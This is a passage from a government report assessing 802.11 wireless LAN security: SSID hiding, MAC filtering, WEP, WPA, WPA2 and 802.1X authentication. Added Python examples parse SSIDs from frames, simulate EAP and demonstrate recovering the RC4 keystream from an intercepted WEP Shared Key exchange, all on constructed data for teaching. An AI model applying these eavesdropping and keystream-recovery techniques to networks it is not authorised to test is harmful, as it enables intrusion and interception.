There are many other 802.11 extensions dealing with various aspects of WLANs in progress or being planned. For example, 802.11e addresses wireless quality of service (QoS) concerns; 802.11p and 802.11r address mobility use and roaming; 802.11s deals with ad-hoc mesh networks; 802.11w is a proposed security-related amendment intended to address the remaining issue of network management information frames being transmitted without protection or encryption; and 802.11y proposes to extend the use of 802.11 into the 3.7 GHz frequency band. A full list of 802.11 amendments and working groups is available on the IEEE web site.

2.5 Wi-Fi™ Interoperability Standard

2.5.1 Wireless Ethernet Compatibility Alliance (WECA) and the Wi-Fi Alliance

Manufacturers often include proprietary features that render their products incompatible with those of other companies. To address this concern, several manufacturers founded WECA in 1999. WECA defined a test suite [5] to ensure interoperability of 802.11b products and correct implementation of WEP. This was soon expanded to include interoperability suites for 802.11g and WPA. In 2002, WECA changed its name to the Wi-Fi Alliance, and at the time of writing the Wi-Fi Alliance has over 320 industry and affiliate members.

Products that pass these tests are deemed to be Wi-Fi (Wireless Fidelity) compliant and are permitted to display the logo. The popular backing of Wi-Fi™ has enabled the 802.11b/g family of products to dominate the WLAN market.

Although often used interchangeably in the media, the terms 802.11 and Wi-Fi™ are not synonymous. The IEEE 802.11 standard contains amendments dealing with all aspects of WLANs, and the 802.11a/b/g/n amendments in particular are PHY and Medium Access Control (MAC) layer specifications, whereas Wi-Fi™ is only an interoperability certification for 802.11a/b/g products. Originally, Wi-Fi was intended to refer only to 2.4 GHz interoperable products, and a Wi-Fi5™ designation was created for certifying 5 GHz band 802.11a WLAN products; however, with the increasing prevalence of dual-band products supporting both 2.4 GHz and 5 GHz standards, the certification was unified to a single Wi-Fi certification. At the time of writing, the following mandatory aspects are covered:

1. Radio standards for 802.11a, b, g, including multi-band support
2. Security implementation: WEP, WPA, WPA2
3. Authentication implementation: EAP

The Wi-Fi Alliance also offers optional certification programs for:

1. Product interoperability for 802.11n Draft 2.0
2. Validation of "easy setup" security features
3. Multimedia-over-Wi-Fi features
4. Low-Power Wi-Fi for multimedia applications
5. Combined Wi-Fi + cellular devices (this certification is mandatory for combined devices seeking CTIA certification)

It is important to note that although products may be Wi-Fi certified, this only refers to operation within the strictures of the specific 802.11 standards. Devices may still contain non-standard, proprietary operating modes which are not covered by the Wi-Fi interoperability requirements (e.g., the "enhanced" 104 Mbps data rate of many commercial 802.11 devices is not compliant with the official 802.11 standards, and such modes are generally NOT compatible or interoperable between vendors, and indeed may employ practices that actually interfere with proper operation of strictly standards-compliant devices which are located within common transmission range). Users are further cautioned to check for compliance with Industry Canada regulations before utilizing these non-standard modes, as some non-standard modes of operation are known to interfere with operation of other 802.11-based networks in the vicinity.
3 Security Mechanisms

3.1 General

With any network, security is an important consideration. Unauthorized access can result in sensitive information disclosure, data modification, denial of service and illicit use of resources. Once an unauthorized user has gained access to the network, monitoring of the now unprotected data can lead to user names and passwords being intercepted, which can then be used for further attacks. WLANs are subject to all the security issues normally faced with conventional wired LANs, but additionally, they suffer from vulnerabilities directly associated with the use of wireless connectivity. The nature of the wireless medium makes it practically impossible to confine the radio signals to a controlled area. These radiated signals are subject to clandestine interception and exploitation. In a traditional wired LAN environment, the physical security of the workplace provides some protection for the LAN, as the users need to physically connect wires to the network to access its resources. In a WLAN environment, this protection is no longer enough since a wireless network can be accessed remotely from a distance without the need for a physical connection: anyone using compatible wireless equipment can potentially access the LAN.

To mitigate these security concerns, encryption is used in an attempt to make the signal unusable by unauthorized parties if intercepted. However, as in most commercial products, ease-of-use for the consumer is the primary concern. To this day, the majority of 802.11 WLAN products typically have all encryption options and security features turned off by default, or, where they are enabled, devices will typically use the simplest and weakest encryption scheme available.

3.2 Access Control

3.2.1 General

Access control is a fundamental requirement for any sensitive network. However, the access control mechanisms specified in the IEEE 802.11 standard are weak. The following two mechanisms, although often promoted as security features, are intended more as interference prevention measures than as access control measures.

3.2.2 Service Set Identifier (SSID)

APs send out beacon messages to announce their presence and operating parameters to clients. The SSID is the part of this beacon message that declares the AP's identity to the network. A client looking for a specific network to join would scan for this SSID and, when the network is discovered, the authentication process begins. By turning off the broadcast of this SSID, clients would not be able to automatically identify and associate with the AP, but would instead require prior knowledge of the SSID. Unfortunately, this mechanism fails as a security feature because, although the SSID is no longer broadcast in the beacon, it is still sent out in other network management traffic, which can be sniffed by an attacker.
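To make the beacon/probe distinction concrete, the following is an added example written for this page; it is not code from ITSPSR-21A or from any vendor. It parses the SSID element out of constructed 802.11 management frames, assuming the standard 24-byte management MAC header, the 12 bytes of fixed fields that precede the tagged elements in beacons and probe responses, and element ID 0 for the SSID. The addresses and the network name "CorpNet" are constructed sample values, not captured traffic.

```python
"""SSID element parser for 802.11 management frames.

Added example, not part of ITSPSR-21A: shows that disabling SSID broadcast
only blanks the SSID element in beacons, while a client's probe request for
the network and the AP's probe response still carry the name in clear, and
that the header addresses are readable from every frame. All frames here
are constructed; none is captured traffic.
"""
import struct

MGMT_SUBTYPES = {4: "probe_request", 5: "probe_response", 8: "beacon"}
ELEMENT_SSID = 0                 # element ID of the SSID tagged parameter
FIXED_FIELDS_LEN = 8 + 2 + 2     # timestamp, beacon interval, capability info
BROADCAST = b"\xff" * 6


def mac_str(addr: bytes) -> str:
    return ":".join("%02x" % b for b in addr)


def parse_mgmt_frame(frame: bytes) -> dict:
    """Return subtype, header addresses and SSID status for one management frame."""
    if len(frame) < 24:
        raise ValueError("frame shorter than the 24-byte management MAC header")
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:              # frame-control type field: 0 = management
        raise ValueError("not a management frame")
    subtype = fc0 >> 4
    # addresses are never encrypted, whatever the data-frame protection in use
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    body = frame[24:]
    if subtype in (5, 8):                  # beacon / probe response: fixed fields first
        body = body[FIXED_FIELDS_LEN:]
    ssid, hidden = None, False
    pos = 0
    while pos + 2 <= len(body):            # walk the (ID, length, value) elements
        eid, elen = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + elen]
        if len(value) != elen:
            raise ValueError("truncated element")
        if eid == ELEMENT_SSID:
            # APs with SSID broadcast disabled send an empty or NUL-filled SSID element.
            if elen == 0 or value == b"\x00" * elen:
                ssid, hidden = "", True
            else:
                ssid = value.decode("utf-8", errors="replace")
            break
        pos += 2 + elen
    return {
        "subtype": MGMT_SUBTYPES.get(subtype, "subtype_%d" % subtype),
        "receiver": mac_str(addr1),
        "transmitter": mac_str(addr2),
        "bssid": mac_str(addr3),
        "ssid": ssid,
        "hidden_ssid": hidden,
    }


def build_mgmt_frame(subtype: int, transmitter: bytes, bssid: bytes,
                     ssid: bytes, receiver: bytes = BROADCAST) -> bytes:
    """Construct a minimal beacon, probe request or probe response (sample data only)."""
    header = (bytes([subtype << 4, 0x00])  # frame control: management, given subtype
              + b"\x00\x00"                # duration
              + receiver + transmitter + bssid
              + b"\x00\x00")               # sequence control
    # probe requests have no fixed fields; beacons and probe responses do
    fixed = struct.pack("<QHH", 0, 100, 0x0431) if subtype in (5, 8) else b""
    return header + fixed + bytes([ELEMENT_SSID, len(ssid)]) + ssid


def ssid_disclosures(frames) -> list:
    """List (subtype, ssid) for every frame that carries a non-hidden SSID."""
    found = []
    for frame in frames:
        info = parse_mgmt_frame(frame)
        if info["ssid"] and not info["hidden_ssid"]:
            found.append((info["subtype"], info["ssid"]))
    return found


if __name__ == "__main__":
    ap, client = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    frames = [build_mgmt_frame(8, ap, ap, b""),                      # hidden-SSID beacon
              build_mgmt_frame(4, client, BROADCAST, b"CorpNet"),     # client probe request
              build_mgmt_frame(5, ap, ap, b"CorpNet", receiver=client)]  # probe response
    print(ssid_disclosures(frames))
```

Run against the three constructed frames, the beacon reports a hidden SSID but both the probe request and the probe response return "CorpNet", which is the traffic the section refers to. The same parser applied to a capture of your own network is a quick way to confirm whether a "hidden" SSID is in fact being disclosed by roaming clients.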
3.2.3 MAC Address Access Control List (ACL)

Some vendors implement a MAC address (i.e., Ethernet address) filter or ACL to prevent unauthorized access to an AP. MAC addresses of authorized clients are entered and stored in a list internal to the AP, and only clients with MAC addresses matching this list are allowed access to the AP (alternately, certain MAC addresses may be blocked instead). This is similarly ineffective as a security measure because all traffic sent over the network contains the MAC address in the unencrypted header. Therefore, by capturing just a single packet and examining its header, an attacker can determine a legitimate MAC address and program his device with this address. Further, the process of manually maintaining a list of all permitted MAC addresses is time-consuming and error-prone, making it only practical for small and fairly static networks.

3.3 Authentication Services

3.3.1 General

Unlike wired LANs, WLANs transmit over a medium without physical bounds. The IEEE 802.11 standard provides access control via the authentication service. All wireless devices use an authentication mechanism to establish their identity prior to association. Association of wireless devices is established only if the authentication is accepted. Authentication can be performed between two devices or between a device and an AP. The IEEE 802.11 core standard defines two types of authentication methods: Open System and Shared Key. The Wi-Fi Alliance's WPA standard and the 802.11i/WPA2 standard add additional authentication modes, and IEEE 802.1X authentication using the Extensible Authentication Protocol (EAP) is also supported as an optional extension to all native authentication modes.

It is important to note that the native authentication methods authenticate the devices; they do not authenticate the users of the devices. Further, in an infrastructure configuration, authentication is not mutual.
Only the wireless client device must prove its identity; the AP is implicitly trusted and there is no way for a client to verify that an AP is legitimate. Additional 802.1X authentication can be used to address these issues, but it requires a dedicated RADIUS or other authentication server and the associated infrastructure to support the additional authentication layer.

3.3.2 Open System Authentication

The Open System provides identification only and is essentially a "null" authentication. A client requesting access to an AP simply sends its MAC address to the AP, and the AP replies with an authentication verification message: any client who requests authentication with this algorithm will be authenticated. This mode of authentication is implemented where ease-of-use is the primary concern or when security is not an issue for a network administrator. It is important to note that Open System authentication is the default setting in many 802.11 WLAN devices.

The 802.11 standard allows for use of WEP encryption even with Open System authentication. In this case, both devices must share a WEP key, but unlike the "Shared Key Authentication" described in the next section, the key is not used for authentication, only for encryption. In this mode, a client is authenticated using Open System authentication and then both ends immediately begin WEP-encrypted communications. This mode is actually considered somewhat more secure than Shared Key authentication because key-related information is not exchanged over the air.

3.3.3 Shared Key Authentication

Shared Key authentication is a feature of the original 802.11 standard and can only be used if the legacy wireless security features of the device are enabled. It does not apply when WPA or WPA2/802.11i is in use, where a similar but somewhat stronger "Pre-Shared Key" scheme is available.

In this mode, the secret shared key is manually distributed and configured on all participating stations. The Shared Key authentication process follows a challenge-response scheme where the encryption/decryption is performed using WEP's RC4 Pseudo-Random Number Generator (PRNG) to validate the challenge-response. After a "success" message is received, the link is considered authenticated. Note that the 802.11 standard also allows for Shared Key authentication without link encryption, but virtually all consumer 802.11 WLAN devices will turn on link encryption by default if Shared Key authentication is used.

The Shared Key authentication method was intended to provide a greater degree of security compared to Open System authentication; however, weaknesses in the WEP encryption used in the challenge-response scheme can allow the key to be easily recovered if this exchange is intercepted by an attacker. As well, it must be noted again that this authentication only confirms the identity of the hardware, not that of the user. Therefore, individuals gaining unauthorized access to wireless devices registered for use on a network can potentially gain access to the network.
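To show exactly what the intercepted exchange gives away, here is an added example (written for this page, not code from the report or any product) that models the Shared Key challenge/response with a minimal RC4 and WEP framing. The challenge travels in clear, the IV travels in clear, and the ICV is a function of the challenge, so an observer who XORs the encrypted response with the known plaintext obtains the RC4 keystream for that IV without the secret. The 104-bit key and the IV are constructed values.

```python
"""What a passive observer learns from 802.11 Shared Key authentication.

Added example, not code from ITSPSR-21A. It models the four-frame
challenge/response of section 3.3.3 with a minimal RC4 and WEP framing.
The 104-bit key and the IV are constructed values; no real frames are
parsed or sent.
"""
import os
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA, producing `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV in clear, then (plaintext || CRC-32 ICV) XOR RC4(IV || secret)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4_keystream(iv + secret, len(plaintext) + 4)
    return iv + xor_bytes(plaintext + icv, keystream)


def shared_key_exchange(secret: bytes, iv: bytes, challenge: bytes):
    """The four authentication frame bodies as they appear over the air."""
    frame1 = b"auth request, algorithm=shared key"   # station -> AP, clear
    frame2 = challenge                                # AP -> station, 128 bytes, clear
    frame3 = wep_encrypt(secret, iv, challenge)       # station -> AP, WEP encrypted
    frame4 = b"auth response, status=success"         # AP -> station, clear
    return frame1, frame2, frame3, frame4


def keystream_from_observation(frame2: bytes, frame3: bytes):
    """Passive observer: IV and challenge are both in clear and the ICV is derived
    from the challenge, so XOR of frame 3 with that known plaintext yields the RC4
    keystream for this IV; the secret itself is never needed."""
    iv, body = frame3[:3], frame3[3:]
    icv = zlib.crc32(frame2).to_bytes(4, "little")
    return iv, xor_bytes(body, frame2 + icv)


def leak_demo() -> bool:
    """True if the observer's keystream equals the real RC4 output for the IV."""
    secret = bytes.fromhex("0123456789abcdef0123456789")   # constructed 104-bit WEP key
    iv = bytes.fromhex("a1b2c3")                             # constructed 24-bit IV
    _, frame2, frame3, _ = shared_key_exchange(secret, iv, os.urandom(128))
    iv_seen, keystream = keystream_from_observation(frame2, frame3)
    return keystream == rc4_keystream(iv_seen + secret, len(keystream))


if __name__ == "__main__":
    print("observer recovered the keystream:", leak_demo())
```

Open System authentication with WEP never emits this known-plaintext pair, which is why the report ranks it above Shared Key when nothing stronger is available; with WPA/WPA2 the question does not arise because the legacy exchange is not used at all.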
Because of this, the previously described method of using Open SystemAuthentication with WEP encryption is actually the preferred mode of operation if no strongerauthentication and encryption measures (e.g. WPA/WPA2) are available. However, adequateuser authentication is also essential no matter which mode is chosen.802.11 does not specify any key management processes or mechanisms, therefore ensuring thesecurity of Shared Keys is the responsibility of the user. As with any passphrase-based system,strong passphrases should be chosen to minimize the possibility of password guessing, andshould be changed regularly.3.3.4 802.1X AuthenticationBoth the WPA and the WPA2/IEEE 802.11i amendment specify the mandatory use of anotherstandard, IEEE 802.1X, for network authentication. 802.1X is an Ethernet standard (IEEE 802.1family; it is not wireless LAN specific) that provides a framework for authentication, on top ofwhich various methods (such as passwords, smart cards, certificates, etc) can be used to verifyidentity. 802.1X works at the MAC layer to restrict network access to authorized entities.Network connectivity is provided through the concept of ports, each of which represents anSecurity Mechanisms May 2009 19
  • 35. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)association between a client station and an access point. Further, the standard specifies threeentities involved in the authentication transaction: the supplicant, the authenticator and theauthentication server. A supplicant (wireless client) is an entity that desires to use a serviceoffered via a port on the authenticator (wireless access point). On a typical network, there maybe many ports available through which a supplicant may authenticate for service. Theauthentication server is the entity that verifies the identity of the supplicant that was submitted tothe authenticator, and directs the authenticator to allow access if the verification was successful.The IEEE 802.1X standard utilizes the Extensible Authentication Protocol (EAP) to permit avariety of authentication mechanisms to be used. Like the legacy Shared Key authentication,EAP is similarly based on a challenge-response scheme utilizing four distinct messages types:EAP Request, EAP Response, EAP Success and EAP Failure. EAP is considered “extensible”because these messages may be used to encapsulate virtually any authentication mechanism,although in practice, only a limited set of protocols is supported by commercial WLANequipment. In EAP-based authentication, initially, the EAP Request message is sent to asupplicant, indicating a challenge to which the supplicant responds with the EAP Responsemessage. Depending on the specific authentication method used, this challenge-responseexchange may be repeated several times and in both directions (allowing mutual authenticationto take place) to exchange authentication data until either an EAP Success or EAP Failure is sentto allow or deny the connection request.Use of 802.1X authentication has the potential to greatly increase the security of any LANinstallation, especially since the authentication method can be geared towards individual userauthentication vs. 
device authentication, which is recommended wherever possible. Note, however, that in most cases a network utilizing 802.1X authentication requires the installation of dedicated infrastructure in the form of an authentication server (RADIUS server). Additionally, even when using server-based authentication, it is important to select a method that addresses the necessary security requirements, as not all EAP methods are created equal. Methods are available that integrate with a PKI infrastructure, two-factor authentication using tokens, etc.; however, most devices support at least the EAP-TLS method, based on the Transport Layer Security (TLS) protocol.

As described earlier, both WPA and WPA2/802.11i implement a Pre-Shared Key authentication scheme that does not require an external authentication server and is intended for home or small network use. Like the legacy Shared Key authentication, it relies on a challenge response derived from a shared key in order to authenticate a device. The PSK mechanism uses a "4-Way Handshake" carried in 802.1X (EAPOL-Key) frames and is much stronger than the legacy RC4-based challenge-response; however, it is still vulnerable to attack if a weak passphrase is chosen. Additionally, the PSK mode of authentication suffers from the same issues as the legacy mechanism, namely those of key management and device vs. user authentication.
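The Request/Response/Success/Failure exchange described above, as an added example that is not part of the original report: a minimal EAP implementation in Python (RFC 3748 packet format, with EAP-MD5 as the challenge-response method) in which a simulated supplicant and authenticator run the exchange to a Success or Failure. The authenticator here also plays the role of the authentication server; the identity, password and the "authenticator" name string are constructed values. Note that the supplicant accepts whatever Success or Failure packet arrives, since nothing in the base protocol authenticates those messages; that is the weakness discussed later in 4.2.3.

```python
"""EAP challenge-response exchange (RFC 3748) between a supplicant and an
authenticator. Both parties are simulated in-process; identity and password
are constructed sample values, not real credentials."""
import hashlib
import os
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

# EAP Code values (RFC 3748 section 4)
REQUEST, RESPONSE, SUCCESS, FAILURE = 1, 2, 3, 4
# EAP Type values used here (Identity, MD5-Challenge)
TYPE_IDENTITY, TYPE_MD5_CHALLENGE = 1, 4


@dataclass
class EapPacket:
    code: int
    identifier: int
    type: Optional[int] = None      # absent for Success/Failure
    data: bytes = b""

    def encode(self) -> bytes:
        body = b"" if self.type is None else bytes([self.type]) + self.data
        # Length covers the whole packet including the 4-byte header.
        return struct.pack("!BBH", self.code, self.identifier, 4 + len(body)) + body

    @classmethod
    def decode(cls, raw: bytes) -> "EapPacket":
        code, ident, length = struct.unpack("!BBH", raw[:4])
        if length < 4 or length > len(raw):
            raise ValueError("bad EAP length field")
        body = raw[4:length]
        if code in (SUCCESS, FAILURE):
            return cls(code, ident)
        if not body:
            raise ValueError("Request/Response without a Type byte")
        return cls(code, ident, body[0], body[1:])


def md5_challenge_response(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """EAP-MD5 (RFC 3748 section 5.4): MD5(Identifier || password || challenge)."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


class Authenticator:
    """Authenticator plus authentication server collapsed into one party."""

    def __init__(self, users: Dict[bytes, bytes]):
        self.users = users
        self.ident = 0
        self.peer: Optional[bytes] = None
        self.challenge = b""

    def start(self) -> EapPacket:
        return EapPacket(REQUEST, self.ident, TYPE_IDENTITY)   # first message: Request/Identity

    def handle(self, raw: bytes) -> EapPacket:
        pkt = EapPacket.decode(raw)
        if pkt.code != RESPONSE or pkt.identifier != self.ident:
            return EapPacket(FAILURE, self.ident)              # unsolicited or replayed
        if pkt.type == TYPE_IDENTITY:
            self.peer = pkt.data
            self.ident += 1
            self.challenge = os.urandom(16)
            # MD5-Challenge data: Value-Size, Value, Name
            data = bytes([len(self.challenge)]) + self.challenge + b"authenticator"
            return EapPacket(REQUEST, self.ident, TYPE_MD5_CHALLENGE, data)
        if pkt.type == TYPE_MD5_CHALLENGE and self.peer in self.users:
            size = pkt.data[0]
            expected = md5_challenge_response(pkt.identifier, self.users[self.peer], self.challenge)
            ok = pkt.data[1:1 + size] == expected
            return EapPacket(SUCCESS if ok else FAILURE, pkt.identifier)
        return EapPacket(FAILURE, self.ident)


class Supplicant:
    def __init__(self, identity: bytes, password: bytes):
        self.identity, self.password = identity, password

    def handle(self, raw: bytes) -> Optional[EapPacket]:
        pkt = EapPacket.decode(raw)
        if pkt.code != REQUEST:
            return None   # Success/Failure end the exchange; the supplicant cannot verify who sent them
        if pkt.type == TYPE_IDENTITY:
            return EapPacket(RESPONSE, pkt.identifier, TYPE_IDENTITY, self.identity)
        if pkt.type == TYPE_MD5_CHALLENGE:
            size = pkt.data[0]
            digest = md5_challenge_response(pkt.identifier, self.password, pkt.data[1:1 + size])
            return EapPacket(RESPONSE, pkt.identifier, TYPE_MD5_CHALLENGE,
                             bytes([len(digest)]) + digest + self.identity)
        return None


def run_exchange(supplicant: Supplicant, authenticator: Authenticator) -> List[int]:
    """Drive the exchange to completion; returns the sequence of EAP Codes seen on the air."""
    codes = []
    msg = authenticator.start()
    while True:
        codes.append(msg.code)
        reply = supplicant.handle(msg.encode())
        if reply is None:
            return codes
        codes.append(reply.code)
        msg = authenticator.handle(reply.encode())


if __name__ == "__main__":
    print(run_exchange(Supplicant(b"alice", b"s3cret"), Authenticator({b"alice": b"s3cret"})))
```

A correct password yields the code sequence Request, Response, Request, Response, Success (1, 2, 1, 2, 3); a wrong password or unknown identity ends in Failure (4). The identifier check in `Authenticator.handle` is the only replay protection the base protocol offers.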
3.4 Data Confidentiality and WEP/WPA/802.11i/WPA2

3.4.1 General

The IEEE 802.11 core standard specifies an optional data confidentiality mechanism using the WEP protocol. It is intended to provide protection for a WLAN from casual unauthorized eavesdropping and to ensure data integrity. Since its release, the WEP protocol has been proven to exhibit many weaknesses, resulting in the development of stronger security and data confidentiality measures. As documented earlier, IEEE 802.11 working group I was formed to tackle this task. Due to the long process, the Wi-Fi Alliance released an interim standard known as Wi-Fi Protected Access (WPA), which was based on an early draft of the eventual 802.11i standard. Because the two improved security standards turned out to be largely compatible, 802.11i was also adopted by the Wi-Fi Alliance and came to be known as Wi-Fi Protected Access version 2 (WPA2). Although WEP/WPA/WPA2 are strictly optional within the 802.11 standard, they are requirements for Wi-Fi compliance certification.

3.4.2 Wired Equivalent Privacy (WEP) Protocol

3.4.2.1 Properties of WEP Protocol

WEP employs the RC4 PRNG algorithm from RSA Data Security, Inc. RC4 is a stream cipher developed in 1987 by Ronald Rivest. The RC4 algorithm expands a variable-sized symmetric key, independently of the plaintext, into a keystream that is combined with the plaintext to produce the ciphertext. The WEP protocol was designed to be:

a. Reasonably strong (difficult to break through brute-force attack);
b. Self-synchronizing (WEP is self-synchronizing for each message);
c. Computationally efficient (may be implemented in hardware or software);
d. Exportable to all countries; and
e.
Optional in use (however, implementation is required for an 802.11 Wi-Fi compliant product).

3.4.2.2 WEP Operation Theory

WEP seeds the RC4 stream cipher with the concatenation of a public 24-bit Initialization Vector (IV) and the secret pre-shared key (generally the same key used for the authentication stage); RC4 expands this seed into an arbitrarily long keystream of pseudo-random bits. Encryption is achieved by performing an exclusive OR (XOR) operation between the keystream and the plaintext (with its appended CRC-32 integrity check value) to produce the ciphertext. Decryption is done by generating the identical keystream based on the IV and secret key and XORing it with the ciphertext to produce the plaintext. Details of the WEP operation can be found in the IEEE 802.11 standard [1].

Many 802.11b vendors produce products that support 40-bit and 104-bit WEP. Some vendors refer to the 40-bit version as "64-bit WEP" and the 104-bit variant as "128-bit WEP". This discrepancy comes from the fact that although the 40-bit secret key and 24-bit IV are
concatenated to make up 64 bits, the 24-bit IV is sent in the clear, thereby reducing the effective key length to only 40 bits. Similarly, 128-bit WEP is actually 104 bits of secret key plus the 24-bit IV. Several 802.11a vendors have added more non-standard WEP lengths; for example, one popular brand of 802.11 appliance features a 152-bit or "True-128-bit" WEP which consists of a 24-bit IV and a full 128-bit key, and another brand offers "256-bit WEP" (in this case, only 232 bits of secret key once the IV is accounted for). Readers are cautioned that such modes require matched hardware and software at both the AP and the wireless client in order to function, and due to weaknesses in the WEP algorithm, these longer key lengths are not considered any more secure than the basic version. Only 40-bit WEP is specified in the 802.11b standard and the Wi-Fi requirements. The other WEP lengths are uncertified industry add-ons that may or may not be well implemented from a security perspective.

Theoretical weaknesses in WEP were pointed out by Walker [8, 7] as far back as 2000, and the first practical attacks against WEP appeared in 2001 [9], demonstrating that WEP is not a robust protection mechanism. WEP suffers from important weaknesses that can provide opportunities for disclosure of information, unauthorized access to the network and denial of service attacks. Because of these vulnerabilities, WEP is ineffective as a primary security measure and the use of WEP is not recommended for the protection of any Government of Canada data. It is imperative that older equipment which does not support stronger security than WEP be replaced or upgraded.

3.4.3 Wi-Fi Protected Access (WPA)

The Wi-Fi Protected Access (WPA) system was created by the Wi-Fi Alliance in an attempt to address the security vulnerabilities in WEP. WPA was an intermediate measure to take the place of WEP while the official 802.11i standard was being developed.
WPA was in fact based on an early draft of the 802.11i standard, with key information elements intentionally changed to avoid the possibility of conflicts between WPA and the eventual 802.11i release. The goals of WPA were largely the same as for WEP; improved security was the main objective, but the new scheme had to be supported on the existing hardware base. To do this, RC4 was retained as the data stream cipher due to its low processing requirements, but "wrapped" to cover the insecurities of WEP.

Several major improvements were made in WPA to improve security. A full 128-bit secret key and a larger 48-bit initialization vector (IV) are used; separate individual keys are used in each direction as well as for integrity validation, and a new per-packet key mixing process known as the Temporal Key Integrity Protocol (TKIP) was added. TKIP continuously and dynamically changes these keys as the system operates and, combined with the longer IV, defeats the key recovery vulnerabilities present in WEP.

Related to TKIP, key security was improved in two ways. Firstly, when the Pre-Shared Key mode is in use, by eliminating the practice of using the shared key and public IV directly as a master encryption key (the same key used for all operations in both upstream and downstream directions) as was done in WEP. Instead, in WPA, a Pairwise Master Key (PMK, which, in this
mode, is the same as the shared key) is combined with other data exchanged during authentication in a procedure known as the 4-Way Handshake to derive a session-specific Pairwise Transient Key (PTK), which in turn drives the TKIP dynamic key generation (as well as key generation for other related WPA services). Note, however, that this does not solve any of the PSK distribution and management issues with using this mode of operation. Secondly, where an 802.1X authentication server is used, the server will generate a random PMK instead of using a fixed key, further improving security.

In addition to authentication and encryption changes, WPA also improved the security around message integrity. The weak 32-bit cyclic redundancy check (CRC-32) used in WEP was replaced by a somewhat stronger, keyed message integrity code (MIC), and a frame counter was added to prevent replay attacks. Although better than the CRC-32 at detecting tampering, the MIC algorithm (called "Michael") used in WPA is still considered cryptographically weak since it, like the CRC-32, is an invertible algorithm that was designed to be able to run on older hardware platforms with limited processor capacity. WPA therefore also implements a MIC spoofing countermeasure which disables the wireless connection for one minute if two frames failing the MIC integrity check are detected within a one minute interval. Unfortunately, because the system is wireless and subject to RF interference, the occasional noisy frame can still pass all the simpler integrity checks and fail the MIC check, causing a shutdown of the network; intentional denial-of-service attackers can also take advantage of this mechanism.
For this reason, some commercial devices may not implement this countermeasure or may allow it to be turned off, which somewhat increases the risk of a spoofing attack but improves overall network robustness.

3.4.4 IEEE 802.11i/Wi-Fi Protected Access version 2 (WPA2)

The official IEEE-endorsed security improvement standard 802.11i was not ratified until 2004 and, being backward compatible with the interim WPA standard, came to be known also as WPA2. As of 2006, all commercial products that wish to be Wi-Fi certified must support WPA2 security measures.

WPA2 continues to support the simple Pre-Shared Key (PSK) mode of operation, which can complicate key management and distribution if there is even a moderate population of wireless users. As with WPA, 802.1X Extensible Authentication Protocol (EAP) authentication is supported; however, the Wi-Fi Alliance now requires validation for a wider range of 802.1X EAP methods under WPA2 in its certification program.

Of primary significance in WPA2 is the introduction of an AES-based encryption protocol known as CCMP, "Counter mode with CBC-MAC Protocol". CCMP uses 128-bit AES in counter mode for confidentiality, combined with a cipher-block-chaining message authentication code (CBC-MAC) that provides an integrated 64-bit message integrity check, as well as a packet number for protection against replay attacks.

Note that the WPA2 definition still supports the old RC4/TKIP/Michael mechanisms for backwards compatibility, but when CCMP encryption is enabled it completely replaces these older mechanisms with much stronger ones and addresses the weaknesses in many of the WPA
mechanisms: AES-based protection now also covers the key exchange phase, and the weak Michael algorithm is superseded by the integral CBC-MAC in CCMP. These and other measures introduced in WPA2 comprise the new 802.11i Robust Security Network (RSN) architecture, which largely addresses the flaws in previous wireless network standards. It should be noted for Government of Canada users that AES-CCMP is a GC-approved mechanism for securing up to Protected B data, and if the use of WLAN is supported by an appropriate threat-risk assessment, use of WPA2 is mandatory for GC WLANs (in the USA, NIST similarly requires the use of CCMP for securing Federal agencies' IEEE 802.11-based WLANs) [21].

Finally, early drafts of 802.11i also specified another AES-based encryption mechanism called WRAP (Wireless Robust Authenticated Protocol). This was the original mechanism chosen by the 802.11i committee, and used AES in the OCB (Offset Codebook) mode, which was considered slightly stronger than the CCMP mode. However, it was abandoned in favour of CCMP due to intellectual property issues and the possibility of incurring licensing fees, and it does not appear in the ratified standard.
4 Vulnerabilities

4.1 Access Control Vulnerabilities

4.1.1 General

The 802.11 standard does not adequately address access control. The following two features offer limited forms of access control.

4.1.2 SSID

The SSID is used for identifying the network, not as a security measure. Unfortunately, the use of an SSID is often mistaken for password protection. The SSID contained in the beacon frame is always sent in plaintext, regardless of the deployment of the WEP option. Any wireless client, malicious or not, can listen for this beacon to obtain the SSID and bypass this low-level access control.

4.1.3 MAC Address Access Control List (ACL)

Some 802.11 vendors offer a MAC Address ACL feature that provides minimal access control by limiting access to only authorized wireless cards. Unfortunately, the frame headers containing the MAC addresses are sent in clear text even when encryption is enabled, and the entries on the ACL can be easily obtained through traffic monitoring. An unauthorized user can spoof these MAC addresses and try to gain access to the AP. Most of the time, the AP still has the factory configuration for the administrator username and password. Once the unauthorized user has accessed the AP, the configuration of the AP can be changed.

4.2 Authentication Mechanism Vulnerabilities

4.2.1 General

The authentication mechanism defined in 802.11 is used to bring the wireless link up to the assumed physical standards of a wired link. There are vulnerabilities present in both the design and the implementation of the service.

4.2.2 Shared Key Authentication Flaw

The Shared Key authentication mechanism is used before an association is allowed. During the challenge-response sequence, both the plaintext challenge and the encrypted challenge are transmitted. This is a security vulnerability since XORing the two together reveals the RC4 keystream for the IV used in the authentication sequence, which an eavesdropper can then reuse.
The 802.11 standard recommends avoiding using the same key and IV pair for the next frame transmitted, but there is no guarantee that implementations follow this recommendation. For this reason, as noted earlier in this document, using Open System Authentication along with WEP is generally considered more secure, as key-related information is not transmitted.
